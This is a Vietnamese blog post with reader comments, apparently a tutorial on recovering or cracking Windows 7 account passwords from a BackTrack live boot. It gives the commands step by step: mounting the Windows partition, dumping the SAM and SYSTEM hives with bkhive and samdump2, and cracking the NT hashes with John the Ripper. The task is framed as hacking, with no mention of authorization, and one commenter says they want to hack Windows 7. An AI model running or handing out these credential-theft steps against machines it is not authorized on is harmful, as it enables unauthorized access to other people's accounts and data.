Dò pass Win 7 dùng Backtrack 4 hoặc BackTrack 5 R2

- Công cụ cần thiết : Backtrack 4
- Bước 1 : xác định tài khoản đăng nhập của Win 7 cần hack.
Ở đây tài khoản là : Administrator.
- Bước 2 : Boot vào Backtrack 4 và chọn boot như hình dưới .




- Bước 3 : Sau khi boot vào xong bắt đầu gõ lần lượt các lệnh :
-              - fdisk -l  ( kiểm tra xem win 7 được cài ở phân vùng nào ở đây là phân vùng /dev/sda2)

-      - mkdir /mnt/sda2
-      - mount –t ntfs /dev/sda2 /mnt/sda2/
-      - cd /mnt/sda2/Windows/System32/config
-      - samdump2 SYSTEM SAM > /root/pass1
-      - cat /root/pass1 | grep Administrator > /root/pass2
-      - cd /pentest/passwords/jtr/
-      - ./john –f:NT /root/pass2
Đến lệnh này là xong, ngồi đợi là có pass.:D
Các bạn down tài liệu hướng dẫn chi tiết : tại đây
Video hướng dẫn :

(Chú ý : chỉ dò được pass có 8 kí tự thôi.Nhiều hơn không dò được.) 

Update  30/04/2012
Phần này hướng dẫn dùng Back track 5 R2 để dò pass Win 7.Có thể dò được mọi pass, miễn là pass đó nắm trong file từ điển(password.lst).Quá trình dò rất nhanh với file password.lst có dung lượng lớn .
Các bước thực hiện lệnh như sau hình sau :
  Code :
bkhive  /media/disk/Windows/System32/config/SYSTEM syskey.txt
samdump2  /media/disk/Windows/System32/config/SAM syskey.txt>passhash.txt
cd /pentest/passwords/john/
 john /root/passhash.txt --format=nt --wordlist="đường dẫn đến file pass list của bạn"

Xong.

9 nhận xét:

  1. sao em dow 1 bản backtrack5 ma ko cai vô máy được. em thử thì nó đòi 1 cái dvd river trống, em mua về và thử cài nhiều lần kô được xong tự nhiên máy bị đơ luôn. anh có thể chỉ e chi tiết được kô. em đang xài dell vostro 1450(core i5 2430, window7) thank anh trước nha!

    Trả lờiXóa
    Trả lời
    1. Bạn cài máy ảo hay máy thật?,Tốt nhất là bạn nên chạy live usb đi như vậy nó sẽ nhận card mạng đầy đủ! :)

      Xóa
    2. Đọc hết khúc đầu bạn nhé
      http://ngoctunggialai.wordpress.com/01-infotech/hacking-cracking/

      Xóa
  2. chú còn non lắm chưa hack đc đâu cu ah nên thiếu lâm tự luyện võ vãi chục năm sau về đây a chỉ cho

    Trả lờiXóa
  3. Bó tay cho mấy đại ka
    Tưởng hack account win 7 trên máy từ xa, chứ hack trên máy mình thì Hiren's boot làm 1 click là ăn ngay

    Trả lờiXóa
    Trả lời
    1. HB chỉ xóa pass, k dò được pass bạn ạ. B k biết thì đọc kĩ trc khi cmt nhá

      Xóa
  4. mình làm cái này k đc bạn à. ngay từ lệnh đầu tiên đã bị lỗi rồi . hix đang định hack win 7

    Trả lờiXóa
  5. chán thật đấy

    Trả lờiXóa
  6. ban ơi backtrack 5 lúc đầu vào chọn phần nào

    Trả lờiXóa